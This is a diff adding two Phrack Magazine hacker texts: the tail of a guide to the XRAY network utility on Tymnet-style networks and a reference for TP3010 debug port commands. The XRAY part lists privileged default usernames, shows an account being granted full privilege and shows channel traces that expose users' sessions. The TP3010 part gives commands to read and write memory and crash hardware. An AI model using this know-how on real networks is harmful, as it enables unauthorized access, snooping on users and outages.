+    2 - super-privileged
+
+
+There are several user names associated with the
+XRAY utility.  These exist on almost any network utilizing
+the Tymnet-II style networking platform.
+
+  PRIORITY    USERNAME
+
+     2        XMNGR
+     2        ISISTECX
+     2        XNSSC
+     1        TNSCMX
+     1        TNSUKMX
+     1        XSOFT
+     1        XEXP
+     1        XCOMM
+     1        XSERV1
+     0        XRTECH
+     0        XTECH
+     0        XOPPS
+     0        XSERV
+     0        XRAY
+
+
+
+COMMANDS  with parameters in <brackets>
+
+HE  Help
+
+    Use this command to display the commands available for that
+    particular node.
+
+GP  Get power <security string>
+
+    This command allows the user to move up to the maximum security
+    level allowed by his username, as specified in the good guy
+    list.
+
+XG  Display and/or modify XRAY goodguy list <entry number> <P/M>
+
+    This command without parameters will display the XRAY goodguy
+    list.  When added with an entry number and 'P' (purge) or
+    'M' (modify), the user can edit the contents of the table.
+    The XGI command will allow the user to enter a new entry
+    into the list.  Any use of XG or XGI to alter the list is
+    a super-privileged command and is audited.
+
+    >XG
+
+    XRAY GOODGUY LIST
+
+    NO.   PRIV  OVER  NAME
+    ----  ----  ----  ----
+    0001  0002  00FF  TIIDEV
+    0002  0001  0030  RANDOMUSER
+    0003  0000  0000  XRAY
+
+    >XGI
+
+    ENTER UP TO 12 CHARACTERS OF USERNAME
+
+    NOD
+
+    ENTER NEW PRIVILEGE AND OVERRIDE - 2,FF
+
+    >XG
+
+    XRAY GOODGUY LIST
+
+    NO.   PRIV  OVER  NAME
+    ----  ----  ----  ----
+    0001  0002  00FF  TIIDEV
+    0002  0001  0030  RANDOMUSER
+    0003  0000  0000  XRAY
+    0004  0002  00FF  NOD
+
+BG  Display and/or modify Bad Guy List <node number> <R/I>
+
+    This command when entered without any parameters displays the
+    "bad guy" list.  When used with a node number and 'R' it will remove
+    that node from the list, and 'I' will included.  The 'R' and 'I'
+    features are privileged commands and usage is noted in audit trails.
+
+    >BG
+
+    2000 701 1012
+
+    >BG 2022 I
+
+    2022 2000 701 1012
+
+HS  Display host information
+
+
+
+ND  Display node descriptor
+
+    This command displays information about the node and its network
+    links.
+
+NS  Display node statistics
+
+    This command displays various statistics about the node including
+    time differentiations in packet loops, which can then be used to
+    determine the current job load on that particular node.
+
+KD  Display link descriptor <linked node>
+
+    This command displays the values of the link to the node specified.
+    This is displayed with columns relating to type of node (TP), speed
+    of the link (SP), number of channels on the link (NCHN), etc..
+
+KS  Display link statistics <up to 8 node numbers>
+
+    This command provides a report on various factors on the integrity
+    of the link to the given node(s), such as bandwidth usage, packet
+    overhead, characters/second transmitted, delays in milliseconds, etc.
+
+BZ  "Zap" link to node <node number>
+
+    This command will cause the link to the specified node to be
+    reset.  This command is privileged and is audited.  If the node
+    "zapped" is not currently linked a "??" error message will be
+    displayed.
+
+TL  Set/Reset trace on link  <node number>
+TN  Set/Reset trace on line  <node number>
+TM  Display trace events     <B(ackground) / F(oreground)>
+
+    These commands are used to display activity between two active
+    nodes.
+
+
+AC  Display active channels <starting channel> <range of channels>
+
+    This command will display all active channel numbers for the given
+    range starting at the given channel number.  Range is in hex.
+
+QC  Query channel status <channel number>
+
+    This command displays information about the given channel,
+    including throughput speed, source and output buffer size and
+    address location.
+
+
+TC  Enable/disable data trace on channel <channel number> <0/1>
+
+    This command with no arguments displays the channels
+    that are being diagnosed by the trace.  The command with
+    a channel number and a '1' will enable data trace for that
+    channel, and a '0' will disable trace on that channel.  Enabling
+    or disabling trace is a privileged command.
+
+TD  Display channel trace data in hex  <count> <I/O>
+TE  Display channel trace data in hex including escapes <count> <I/O>
+TA  Display channel trace data as ASCII  <count> <I/O>
+
+    With these commands trace data is displayed for a specified
+    time count.  A prefixed 'I' or 'O' will show input or output
+    data.  The default is both.
+
+    >ta 5
+
+    I/O   CHN   TIME
+    OUT  0040   ECC5  \86\86\0F\00\8A\80h\80\8CS\83valinfo;
+    IN   0040   EC87  \00\09\86\86\0D\08\00\00h
+    OUT  0040   0F67  \86\86\0E\00\880\8D
+    IN   0040   1029  \00,\86\86\09\86\00\00\90\1B\19\80 \06\86\00\00h
+                      \15\1B\08J\04\0B\04\0F\04=\0DR\80JS\80\80
+                      \8CVALINFO\8D
+    OUT  0040   102F  \86\86\14\89p\90\1B\19\86\86\14\89j\18\15\13
+
+**Note:  Although this will allow one to follow the network connections
+         on specific channels, password data is filtered out.  As you
+         can see from the above example, usernames are not.  Many
+         usernames do not have passwords, as you all know.  **
+
+On more recent versions of XRAY a similar command "DR" performs a
+similar function to the trace commands, but shows both hex and
+ascii of the data in memory registers of the node.
+
+    >DR
+
+    I NOS 0001 A0  *
+    I SND 0001 A1  *  !
+    I DTA 4920 616D 2061 6E20 6964 696F 7420 6265  *I am an idiot be*
+          0002 9D63 6175 7365 2049 206C 6566 7420  *   cause I left *
+          6D79 7365 6C66 206C 6F67 6765 6420 696E  *myself logged in*
+          2061 6E64 2077 656E 7420 686F 6D65 2E0D  * and went home. *
+          6F70 7573 2520 0D0A 0D0A 0D0A 0D0A 0D0A  *opus%           *
+
+BS  Display bufferlet use statistics
+
+    This command shows the current and past usage of the memory
+    allocated to data buffering.  This shows total usage, total peak
+    usage, and available buffer size.
+
+RB  Read buffer <buffer index>
+
+    This command displays the entire contents of the given buffer.
+    This is a privileged command and its use is not primarily for user
+    circuits.  Primarily.
+
+    >RB 69
+
+    50 61 72 74 79 20 6F 6E 20 64 75 64 65 21 21 21
+
+WB  Write buffer <buffer index>
+
+    This command writes up to seven bytes into the specified buffer.
+    The buffer must greater than 4.  This is also a privileged command.
+
+CD  Set/reset CRYPTO auto display mode <Y/N>
+CL  Display CRYPTO log <number of minutes>
+CM  Display CRYPTO messages by type
+SM  Enable/Disable CRYPTO messages by type
+
+    CRYPTO messages are informational messages about the activity of
+    the node.  Up to 256 such entries are stored in a circular buffer
+    to record this activity.  You can turn on automatic reporting
+    of these messages with the CD command prefixed with a 'Y' for
+    on and 'N' for off.  Certain message types that become bothersome
+    can be disabled with the SM command and the message type.
+
+DB  Begin delay measurement
+DD  Display delay measurement statistics
+DE  Terminate delay measurement
+DL  Begin data loopback circuit
+
+    These commands are used to build circuits for testing the speed and
+    integrity of data flow between two nodes.  The DL command is
+    super privileged and only one such circuit can be built on
+    a node at a given time.  The data traffic generated by the DL is for
+    diagnostic use only and can be monitored by viewing node and link
+    statistics.
+
+PM  Measure performance on a channel <channel number>
+
+    This command measures the performance of a given channel by
+    inserting a timing sequence into the packet stream.  Once it has
+    reached the given channel it is returned and a value corresponding
+    to the total time elapsed in milliseconds is displayed.  If the
+    channel is not active, or no response is returned in 8 seconds the
+    message "BAD CHANNEL OR TIMEOUT" is displayed.
+
+LE  Set local echo mode
+RE  Set remote echo mode
+
+    One would use the set local echo command if the XRAY terminal
+    is not echoing commands typed by the user.  By default, XRAY does
+    not echo output.
+
+
+SUMMARY
+
+    XRAY is pretty confusing.  Be careful with what you are doing
+    since you are essentially prodding around in the memory of the
+    node.  Think of it in terms of using a utility to poke and prod
+    the memory of your own computer.  Think of how disastrous a
+    command written to the wrong portion of memory can be.  Don't
+    do anything stupid, or you might bring down a whole network,
+    or at minimum lose your access.
diff --git a/phrack42/7.txt b/phrack42/7.txt
new file mode 100644
index 0000000..75adf67
--- /dev/null
+++ b/phrack42/7.txt
@@ -0,0 +1,597 @@
+                         ==Phrack Magazine==
+
+             Volume Four, Issue Forty-Two, File 8 of 14
+
+             USEFUL COMMANDS FOR THE TP3010 DEBUG PORT
+
+                             BY G. TENET
+
+
+    ALL OF THE COMMANDS LISTED BELOW, INDICATE A LENGTH IN ALL THE READ
+COMMANDS. THE LENGTH OF THE READ COMMANDS MAY VARY DUE TO
+CONFIGURATION OPTIONS AND SOFTWARE VERSION.
+
+1)  L7FE,L,A,R200
+
+    THIS COMMAND STRING WILL LOAD '7FE' INTO THE MEMORY POINTER
+REGISTER THEN LOAD THE CONTENT OF '7FE' AND '7FF' INTO THE MEMORY
+POINTER REGISTER. THE 'A' THEN INCREMENTS THE CONTENTS OF THE MEMORY
+POINTER REGISTER.  THE 'R200' COMMAND THEN READS 200 BYTES BEGINNING
+AT THE LOCATION SPECIFIED BY THE MEMORY POINTER REGISTER.
+    THIS AREA IS USED FOR STORING THE LOADED CONFIGURATION. DUE TO THE
+VARIABLE NATURE OF THE CONFIGURATION RECORDS, THE READ COMMAND MAY HAVE
+TO BE MODIFIED DEPENDANT ON THE NUMBER OF LINES DEFINED, THE TYPE OF LINES
+DEFINED (X780,3270) AND THE TYPE OF SOFTWARE LOADED (4.2X OR 5.0X).
+
+
+2)  LC4,R3,LCC,R3  (4.2X SOFTWARE)
+    L124,R3,L131,R3  (5.0X SOFTWARE)
+
+    THIS COMMAND STRING WILL DISPLAY THE BUFFER MANAGER CONTROL BLOCK AREA
+WHICH HAS BUFFER COUNTS WHICH MAY SUGGEST POSSIBLE PROBLEMS.
+
+
+3)  L32C,R   (4.2X SOFTWARE)
+    L29C,R   (5.0X SOFTWARE)
+
+    THIS COMMAND STRING WILL DISPLAY THE NUMBER OF ACTIVE VC'S IN THE
+TP3 AT THAT MOMENT.
+
+    IF THIS COMMAND IS USED VIA THE LOCAL CONSOLE, THE VC COUNT WILL NOT
+INCLUDE THE USER CONNECTION BECAUSE THERE WILL BE NO VC ON THE X.25 LINE
+FOR THE LOCAL CONSOLE.
+
+4)  L70,R60
+
+    THIS COMMAND STRING WILL DISPLAY THE LCB (LINE CONTROL BLOCK) POINTER
+FOR THE CONFIGURED LINES.
+
+    THE ORDER THAT THE LCB POINTERS ARE ENTERED ARE: CONSOLE LCB, X.25 LCB,
+LINE 1, LINE 2, LINE 3...LINE27.  ANY ZERO ENTRY IS AN UNCONFIGURED
+LINE EACH LINE ENTRY IS TWO BYTES LONG.
+
+
+5)  L300,L,R20    (4.2X SOFTWARE)
+    L270,L,R20    (5.0X SOFTWARE)
+
+    THIS COMMAND STRING WILL DISPLAY THE LCN VECTOR TABLE. THE ENTRIES ARE
+FOR EACH ACTIVE LCN BEGINNING WITH LCN 0 THRU THE HIGHEST CONFIGURED
+LCN. A 0000 ENTRY FOR AN LCN WILL INDICATE THAT THE LCN IS NOT ACTIVE.
+A NON ZERO ENTRY WILL POINT TO THE DCB (DEVICE CONTROL BLOCK) OF THE
+ASSOCIATED LINE/DEVICE.
+
+6)  L1F1,L,R20     (4.2X SOFTWARE ONLY)
+
+    THIS COMMAND STRING WILL DISPLAY THE PROTOCOL ID TABLE FOR THE
+CONFIGURED/SUPPORTED PROTOCOLS. THE FORMAT OF THE OUTPUT
+IS:
+          999999999999...
+          --  ----
+          ! -- !  ----
+          ! !  !   !...............POINTER TO THE SERVER TABLE   *****
+          ! !  !...................POINTER TO THE PROTOCOL SERVICE ROUTINE
+          ! !......................PROTOCOL ID NUMBER
+          !                          01 =ITI (RITI AND LITI)
+          !                          4B =X780
+          !                          47 =NAP 3270
+          !                          09 =DEBUG
+          !........................NUMBER OF ENTRIES IN THIS TABLE
+
+
+7)  L(ADDRESS OF THE SERVER TABLE),R20
+
+    THE ADDRESS OF THE SERVER TABLE IS FOUND IN #6 (ABOVE)
+  THIS COMMAND WILL DISPLAY THE SERVER TABLE IN THE FORMAT:
+
+         99999999...
+         --  ----
+         ! -- !................ THIS IS THE ADDRESS OF THE FIRST FREE DCB
+         ! !                     IN THE FREE DCB LIST. IF 0000 THEN THERE ARE
+         ! !                     NO FREE DCB'S FOR THIS SERVER AND PROTOCOL.
+         ! !.....................SERVER NUMBER
+         !.......................NUMBER OF ENTRIES IN THIS TABLE
+
+
+    THE POINTER IN THIS TABLE , IF PRESENT, WILL POINT TO THE NEXT AVAILABLE
+DCB.  WITHIN THE DCB, THERE IS A POINTER AT DISPLACEMENT 18 AND 19 WHICH
+WILL POINT TO THE NEXT FREE DCB. THE LAST FREE DCB WILL HAVE A
+POINTER OF 0000.
+
+    THE FOLLOWING COMMANDS ARE USED WITHIN THE TP3 DEBUG PORT TO
+PERFORM THE INDICATED ACTIONS.  ONLY THE TP3325 WILL SUPPORT THE
+[# LPU NUMBER] OPTIONS.  THE USE OF THE [# LPU NUMBER] OPTION IS ONLY
+REQUIRED IF YOU WISH TO ADDRESS A DIFFERENT LPU NUMBER; EXCEPT FOR THE
+'S' COMMAND WITH WHICH THE LPU MUST BE DEFINED.
+
+     A SPACE CHARACTER MAY BE INCLUDED IN THE COMMAND AND THE COMMANDS
+MAY BE STACKED (EXAMPLE:  L7FE ,L,A,R5,L#2,L 7FE,L,A,R5,L#3 7FE,L,A,R 5).
+
+    THE TP3325 COMMANDS THAT DO NOT USE THE 'LPU' PARAMETER USE THE
+LAST ASSIGNED LPU NUMBER.  (EXAMPLE:  L#27FE,R2,L#17FE,R4)
+THE  FIRST LOAD COMMAND ADDRESSES LPU 2 AND THE NEXT LOAD COMMAND ADDRESSES
+LPU 1.  THE READ OF TWO BYTES IS READING FROM LPU 2 AND THE READ OF FOUR
+BYTES IS READING FROM LPU 1.
+
+                A VALUE
+                      INCREMENTS THE MEMORY ADDRESS POINTER.
+                      (EXAMPLE:  A5 OR AFFE2 OR A#2EF)
+
+                B VALUE
+                      USED TO ENTER OR EXIT BINARY MODE.
+                      (EXAMPLE:  B01 OR B00)
+
+                C [# LPU NUMBER] VALUE
+                      USED TO WARM OR COLD START A TP3325 LPU
+                           (EXAMPLE:  C00 OR C#300)
+                                  OR
+                      USED TO WARM OR COLD START OTHER TP3.
+                           (EXAMPLE:  C01 OR C#201)
+
+                D VALUE
+                      USED TO DECREMENT THE MEMORY POINTER.
+                      (EXAMPLE:  D18 OR DFFE5 OR D#4IFF)
+
+                E STRING
+                      USED TO CHECK FOR A EQUAL COMPARE OF MEMORY DATA.
+                      (EXAMPLE:  E00 OR E0F0304 OR E#20000)
+
+                F STRING
+                       USED TO FIND THE FIRST OCCURRENCE OF A STRING.
+                       (EXAMPLE:  F0F0304 OR F08080202 OR F#308080404)
+
+                G [# LPU NUMBER] VALUE
+                      USED  TO  FIND THE ADDRESS OF A CONFIGURATION FILE IN
+                      MEMORY.  THE LPU DEFINITION IN THE COMMAND DOES
+                      NOT CHANGE THE LPU ASSIGNMENT IN THE DEBUG PORT.
+                      (EXAMPLE:  GFE OR G01 OR G#301)
+
+                I [# LPU NUMBER]
+                      USED TO OBTAIN A LIST OF THE CONFIGURED LINE TYPES.
+                      (EXAMPLE: I OR I#3)
+
+                K [# LPU NUMBER] [14 DIGIT ADDRESS]
+                      USED  TO  OBTAIN  THE LCB, ADDRESS TABLE POINTERS AND
+                      LINE NUMBER ASSOCIATED WITH THE ADDRESS.
+                      (EXAMPLE:  K31102120012301 OR K#2 311021250212)
+
+                N STRING
+                      USED TO CHECK FOR AN NON EQUAL COMPARISON.
+                      (EXAMPLE:  N0F0304 OR N08080202 OR N#1 0F)
+
+                P [# LPU NUMBER] PORT NUMBER
+                      USED TO READ THE CONTENTS OF A SPECIFIC PORT REGISTER.
+                      (EXAMPLE:  P45 OR P21 OR P#4 21)
+
+                R VALUE
+                      USED TO READ MEMORY DATA. THE QUANTITY IS INDICATED
+                      BY THE 'VALUE'.
+                      (EXAMPLE:  R18 OR R200)
+
+                S [# LPU NUMBER] LINE NUMBER
+                      USED TO OBTAIN DATA SET SIGNALS FOR THE DEFINED LINE
+                      NUMBER.
+                      (EXAMPLE:  S1 OR S#23 OR S)
+
+                T     (TP3325 ONLY)
+
+                W STRING
+                      USED TO WRITE DATA INTO MEMORY.
+                      (EXAMPLE:  W0E0304 OR W08080707)
+
+                X [# LPU NUMBER]
+                      USED TO DISPLAY THE DIFFERENCE BETWEEN THE STORED
+                      CHECKSUM AND A CALCULATED CHECK SUM OF THE
+                      OPERATING SOFTWARE.  THE LPU DEFINITION DOES
+                      NOT CHANGE THE LPU ASSIGNMENT IN THE DEBUG PORT.
+                      (EXAMPLE:  X OR X#2)
+
+                Y     (TP3325 ONLY)
+                      RETURNS NCC LOAD ADDRESS FROM EPROM
+
+                Z     (TP3325 ONLY)
+                      CRASHES APB AND XPB.  MAY HANG APB IF THE X.25
+                      INTERFACE DOES NOT RESET.
+
+                $ PORT A  -- ENABLE AUTOCONNECT
+                       M  -- DISABLE AUTOCONNECT
+                       B  -- BUSY
+                       R  -- RESET
+                       C  -- CLEAR
+
+HARDWARE COMMANDS FOR THE TP3000
+
+    'P' COMMAND DISPLAYS THE STATUS OF A SPECIFIED PERIPHERAL INTERFACE
+DEVICE FOR THE CPU. FOLLOWING IS A LIST OF SOME OF THE MORE USEFUL ADDRESSES
+WHICH CAN BE BENEFICIAL IF TRYING TO RESEARCH A PROBLEM.
+THIS COMMAND IS A READ TO THE SPECIFIED DEVICE.  DEPENDANT ON THE DEVICE
+BEING READ (THE ADDRESS), THE TP MAY CRASH.
+
+      COMMAND                               INTERPRETATION
+      =======                               ==============
+
+ TP3010
+ ------
+       P45                        READ CONSOLE READ REGISTER
+                                    (BIT 2 THRU 6 SHOW THE POSITION OF
+                                     THE FRONT PANEL ROTARY SWITCH)
+                                    BIT 0 = NOT TIMEOUT STATUS (SEE P47)
+                                    BIT 1 = NOT PBRST STATE (SEE P47)
+                                    BIT 2 = NOT RESTART
+                                    BIT 3 = NOT MEMORY SAVE
+                                    BIT 4 = NOT TAPE LOAD
+                                    BIT 5 = NOT PROGRAM SAVE
+                                    BIT 6 = NOT DIAGNOSTICS
+                                    BIT 7 = NOT SYSTEM GOOD
+                                  IF BIT 6 THRU BIT 2 ARE ALL SET (EQUAL TO 1)
+                                    THEN THE FRONT PANEL SWITCH IS IN
+                                    THE X.25 LOAD POSITION.
+       P47                        THIS COMMAND WILL CAUSE THE FRONT PANEL
+                                     ALARM TO SOUND.
+
+       P4D,P4D,P4D,P4D,P4D,P4D,P4D THE LAST RESPONSE WILL PROVIDE THE
+                                     DOWN LINE LOAD EPROM REV. LEVEL
+                                     FOR THE TP3010.
+                                     EXAMPLE  43 = 'C' LEVEL
+ TP3005
+ ------
+       P23                            BIT 1 = 0  CONFIG MODE
+                                              1  RUN MODE
+
+        4.2X        5.XX                        COMMENTS
+       ======      ======        ===========================================
+
+         70          70           LCB VECTOR TABLE
+
+                                  2 BYTES FOR EACH LINE IN THE TP. IF LINE IS
+                                  NOT DEFINED , THEN ENTRY IS 0000. IF LINE
+                                  IS DEFINED, THEN ADDRESS POINTS TO THE
+                                  LCB (LINE CONTROL BLOCK)
+
+         C0          120          BM CONTROL BLOCK
+         C4          124          # CONTROL BUFFERS INITIALIZED
+         C5          125          # CONTROL BUFFERS FREE
+         C6          126          LOWEST # CONTROL BUFFERS (00 IS NONE LEFT)
+                     12B          POINTER TO THE CONTROL BUFFERS
+         CC          131          # BLOCK BUFFERS INITIALIZED
+         CD          132          # BLOCK BUFFERS FREE
+         CE          133          LOWEST # BLOCK BUFFERS REACHED (00 IS NONE
+                                     LEFT)
+                     138          POINTER TO BLOCK BUFFERS
+         1F1                      POINTER TO PROTOCOL ID TABLE
+
+         270         1F0          X.25 LCB
+         27E         27E             # FRAMES DISCARDED
+         27F         27F             # CRC ERRORS
+         280         280             # REJECTS SENT
+         281         281             # REJECTS RECEIVED
+         282         282             # T1 TIME OUTS
+         283         283             # COMMAND REJECTS SENT
+         284         284             # COMMAND REJECTS RECEIVED
+         285         285             # DISCONNECTS SENT
+         286         286             # DISCONNECTS RECEIVED
+         287         287             # SET MODE SENT
+         288         288             # SET MODE RECEIVED
+         289         289             # FRAME OVERFLOW RECEIVED
+         28A         28A             # I FRAMES SENT
+         28B         28B             # I FRAMES RECEIVED
+         2B0         230               DMA LCB
+
+         300         270               LCN VECTOR TABLE
+
+                     29B               MAX. # LCN'S
+         32C         29C               # OF ACTIVE LCN'S
+
+         7FE         7FE               POINTER TO THE END OF THE OPERATING
+                                       SYSTEM. THE NEXT BYTE IS THE BEGINNING
+                                       CONFIGURATION TABLES.
+
+        159           E9               TIME OF DAY CLOCK
+        159           E9                 1/10 SECONDS
+        15A           EA                 SECONDS
+        15B           EB                 MIN.
+        15C           EC                 HOURS
+        15D           ED                 DAYS
+        15E           EE                 DAYS
+
+       DCB + 3        XX               PACKET REC. STATUS BYTE#1
+                                         00 = READY
+                                         01 = DTE WAITING
+                                         02 = DCE WAITING
+                                         04 = DATA TRANSFER
+                                         08 = DTE CLEAR REQUEST SENT
+                                         10 = DCE CLEAR INDICATION
+                                         20 = DTE RESTART REQUEST
+                                         40 = DTE RESET REQUEST
+                                         80 = DCE RESET INDICATION
+       DCB +18        XX               POINTER TO NEXT FREE DCB
+                                         VALID ONLY IF THIS IS A FREE DCB
+
+  ITI SPECIFIC LCB INFORMATION
+
+                    LCB+27        PHYSICAL STATUS
+                                  X'00' LINE DOWN/INACTIVE
+                                  X'01' LINE HAS BEEN INACTIVATED
+                                  X'02' LINE IS 'BUSY OUT'
+                                  X'04' LINE IS BEING ACTIVATED
+                                  X'08' LINE IS ACTIVE
+                                  X'10' LINE IS BEING INACTIVATED
+
+                    LCB+28        TDT2 COMMAND BYTE
+                                  BIT 0 = 1  BUSY LINE
+                                  BIT 1 = 1  CLEAR LINE
+                                  BIT 2 = 1  RESET LINE
+                                  BIT 3 - 7 NOT USED
+
+                    LCB+5C        # BUFFERS ALLOCATED TO THIS LINE
+                    LCB+5D        DRIVER ERROR COUNTER
+                    LCB+5E        NO BUFFER ERROR COUNTER
+                    LCB+5F        FLOW CONTROL ERROR COUNTER
+                    LCB+60        PARITY ERROR COUNTER
+                    LCB+61        OVER-RUN ERROR COUNTER
+                    LCB+62        FRAMING ERROR COUNTER
+                    LCB+74        BREAK TIMER
+                    LCB+75        RING-OUT TIMER
+                    LCB+76        RING-OUT COUNTER
+
+  DSP 3270 LCB SPECIFIC INFORMATION
+
+                    LCB+4F        CURRENT NO. SYNC PAIRS INSERTIONS
+                    LCB+50        CURRENT NO. OF ERROR RETRIES
+                    LCB+51        CURRENT NO. OF NAK RETRIES
+                    LCB+52        CURRENT NO. OF ENQ RETRIES
+                    LCB+53        RECEIVE ACK COUNTER
+                    LCB+54        TRANSMIT ACK COUNTER
+                    LCB+55        CTS  DROP-ERROR COUNTER
+                    LCB+56        DCD  DROP-ERROR COUNTER
+                    LCB+5A        CURRENT NO. WACK'S
+
+
+  X780 LCB SPECIFIC INFORMATION
+
+                    LCB+4F        CURRENT NO. OF SYNC PAIR INSERTIONS
+                    LCB+50        CURRENT NO. OF ERROR RETRIES
+                    LCB+51        CURRENT NO. OF NACK RETRIES
+                    LCB+52        CURRENT NO. OF ENQ RETRIES
+                    LCB+53        RECEIVE ACK COUNTER
+                    LCB+54        TRANSMIT ACK COUNTER
+                    LCB+55        CTS  DROP-ERROR COUNTER
+                    LCB+56        DCD  DROP-ERROR COUNTER
+
+
+ COMMON DCB INFORMATION
+
+                    DCB+6         BITS 5-7 PACKET SEND SEQ. NO. P(S)
+                    DCB+7         BITS 5-7 PACKET REC. SEQ. NO. P(R)
+                    DCB+8         LCN #
+                    DCB+9         BITS 5-7 PACKET SEQ. NO. LAST CONFIRMED
+                    DCB+A         BITS 5-7 PACKET SEQ. NO. LAST SENT TO NET
+                    DCB+B         # PACKETS SENT
+                    DCB+D         # PACKETS REC.
+                    DCB+F         # RESETS SENT OR RECEIVED
+                    DCB+14        # BUFFERS IN HOLD QUEUE
+                    DCB+15        TIME VC WAS ESTABLISHED (SSMMHHDD)
+                    DCB+31        DESTINATION NETWORK ADDRESS
+
+
+
+    THE FOLLOWING IS A DESCRIPTION OF THE TP3006 X.25 INTERFACE FROM THE
+SIO TO THE REAR PANEL CONNECTORS.
+
+            SIO CHIP                     REAR PANEL CONNECTOR
+          +--------------+
+          |              |
+          |        DTRB  |------------------->- DTR  20
+          |        TXDB  |------------------->- TXD   2
+          |        RTSA  |------------------->- LDL  13
+          |        RTSB  |------------------->- RTS   4
+          |        DTRA  |------------------->- LAL  19
+          |        DCDA  |---<-----------+--->- CTR  18
+          |              |               +---<- RLSD  8
+          |        RXCA  |--+
+          |        RXCB  |--+-------- ** ----<- RXC  17
+          |              |                 +->- TXCE 24
+          |              |            ** --+->- RXCE 11
+          |        TXCA  |----+
+          |        TXCB  |----+------ ** ----<- TXC  15
+          |        DCDB  |----------- ** ----<- DSR   6
+          |        CTSB  |-------------------<- CTS   5
+          |        RXDA  |----+
+          |        RXDB  |----+--------------<- RXD   3
+          |        CTSA  |-------------------<- RI   22
+          |              |
+          +--------------+
+
+                         <   INBOUND SIGNAL
+                         >   OUT BOUND SIGNAL
+
+    IF DSR AND TXC, THEN USE EXTERNAL CLOCKING.  IF DSR AND NO TXC,
+THEN USE INTERNAL CLOCKING DERIVED FROM THE CONFIGURED LINE SPEED
+PRODUCED FROM A CTC CHIP).  IF THE CLOCKING IS PRODUCED INTERNALLY,
+THEN THE INTERNAL CLOCK IS ALSO PROVIDED ON PINS 11 AND 24
+AT THE REAR PANEL.
+
+    FOR THE TP3325, THE NETLINES ALWAYS USE THE EXTERNAL CLOCK SOURCE.
+THE HARDWARE WAS CHANGED DURING REFINEMENT OF THE MOD ONE XPB.
+
+    IF THE ATTACHED DEVICE IS PROVIDING CLOCKING AND THE TP3025 IS PROVIDING
+CLOCKING, THE TP WILL DETECT THE CLOCKING AND WILL STOP CLOCKING. IN THE
+CASE OF THE TP3025 HAVING BEEN RESET AND LOADED, IF A TP3005/3006 IS THEN
+CONNECTED TO THE INTERFACE, THERE IS A RACE CONDITION WHERE THE DEVICE THAT
+PROVIDES THE CLOCKING IS ARBITRARY.  THE HARDWARE LOGIC REQUIRES A RESET
+TO OCCUR FOR THE TP3025 TO CHANGE PRIOR SELECTION OF 1) INTERNAL/EXTERNAL
+CLOCKING AND 2) V35/RS232 INTERFACE AFTER A LOAD.
+
+    THE DEBUG PORT "S" COMMAND WILL RETURN ONE HEX BYTE THAT REPRESENTS
+THE DATA SET SIGNALS STATUS AT THE SIO CHIP FOR THE DEFINED LINE
+(E.G. "S2" WILL RETURN THE DATA SET SIGNALS ON LINE 2).  THE UPPER HALF
+OF THE BYTE IS USED TO REPRESENT THE DATA SET SIGNAL STATUS.
+
+                    BIT  7  6  5  4  3  2  1  0
+                         |  |  |  |  ==========
+                         |  |  |  |   NOT USED
+                         |  |  |  |
+      DSR AT THE REAR ---+  |  |  +--- RTS AT THE REAR PANEL.
+      DTR AT THE REAR  -----+  +------ CTS AT THE REAR PANEL.
+
+     THE FOLLOWING IS A DESCRIPTION OF THE DEVICE INTERFACE FOR THE
+SIO TO THE REAR PANEL.
+
+               SIO CHIP                         REAR PANEL INTERFACE
+          +--------------+
+          |              |
+          |          RXD | ------------------------<  2  TD
+          |          TXD | ------------------------>  3  RD
+          |          DCD | -<-----------+----------<  4  RTS
+          |              |              +---------->  5  CTS
+          |          DTR | ------------------------>  6  DSR
+          |          RTS | ------------------------>  8  DCD
+          |          RXC | -<--------- ** ---------< 11
+          |              |  PIO DSR -- ** ---------< 20  DTR
+          |              |          -- ** ---------> 15  TC
+          |              |          -- **  --------> 17  RC
+          |          TXC | -<--------- ** ---------< 24  TC
+          |          CTS | -<----------------------< 18
+          |              |
+          |              |    PIO -----------------< 25
+          |              |    PIO -----------------> 22
+          |              |
+          +--------------+
+
+    WITH DTR TRUE ( PIN 20), RXC (PIN 11) IS CHECKED FOR AN INBOUND CLOCK
+SIGNAL.  IF THERE IS A CLOCK SIGNAL, THEN THE SIO IS CLOCKED EXTERNALLY
+FROM PIN 11 AND 24.  IF THERE IS NO CLOCK ON PIN 11 THEN AN INTERNAL CLOCK
+SOURCE IS GATED TO THE SIO AND TO PIN 15 AND 17 ON THE REAR PANEL INTERFACE.
+
+     THE OUTPUT OF THE DEBUG PORT 'S' COMMAND DISPLAYS ONE HEX BYTE THAT
+IS A COMPOSITE OF THE DATA SET SIGNALS FROM THE PIO AND SIO CHIPS.  THE
+OUTPUT BIT DEFINITIONS ARE THE SAME AS THE X.25 LINE BUT A NOTE NEEDS
+TO MADE THAT THE X.25 IS A DTE INTERFACE AND THE DEVICE LINES ARE A
+DCE INTERFACE.  THE UTILIZATION OF THE INBOUND RTS/CTS MAY NOT BE
+REQUIRED FOR THE TP TO MAINTAIN THE INTERFACE.
+
+    PINS 22 AND 25 ARE PAD DEPENDANT SO THEY MAY BE USED FOR
+DIFFERENT FUNCTIONS THAN THOSE EXPECTED.
+
+                   ALL NUMERIC VALUES ARE IN HEX.
+                   COMMAND STRINGS CAN BE USED WHILE IN THE DEBUG PORT.
+
+             ==============================================================<
+             |    XCB DIRECTORY TABLE   (two bytes per entry)               >
+             |  DEBUG |LOGGER| X.25 #0 | X.25 #1 | X.25 #2 | X.25 #3|.......
+     L70,R24 |   DCB  |  DCB |   XCB   |   XCB   |   XCB   |  XCB   |        >
+             |===============================================================>
+                 |        |        |       |            |        |
+               XCB#0    XCB#1  | XCB#2   XCB#3     |  XCB#4    XCB#5
+                               |   |       |       |    |        |
+        +->>---------------->>-+   |       |    +>>+    |        |
+        |                          |       |    |       |        |
+        |    +<<----------------<<-+     L76,R2 |       |      L7A,R2
+        |    |                                  |       |
+        |    |  L74,L,R80                       | +<<---+ L78,L,R80
+        |    |                                  | |
+        |    +------------->>-------------->    | +--------->>------------->
+        |    |  XCB        >>              >    | | XCB     >>             >
+        |    +------------->>-------------->    | +--------->>------------->
+        |                       | XCB+2D        |                 | XCB+2D
+        |                       |            +>>+                 |
+        |    +-<<---------------+            |   +-<<-------------+
+        |    |                               |   |
+        |    | L(XCB+2D),L,R((MAX.LCN*3)+3)  |   | L(XCB+2D),L,R((MAX.LCN*3)+3)
+        |    |                               |   |
+        |    +------------------>>-------->  |   +------------------>>-------->
+        |    | LCN VECTOR TABLE >> ABCCDD >  |   | LCN VECTOR TABLE >> ABCCDD >
+        B    |3 BYTES PER ENTRY >> ====== >  B   |3 BYTES PER ENTRY >> ====== >
+        |    +------------------>>-------->  |   +------------------>>-------->
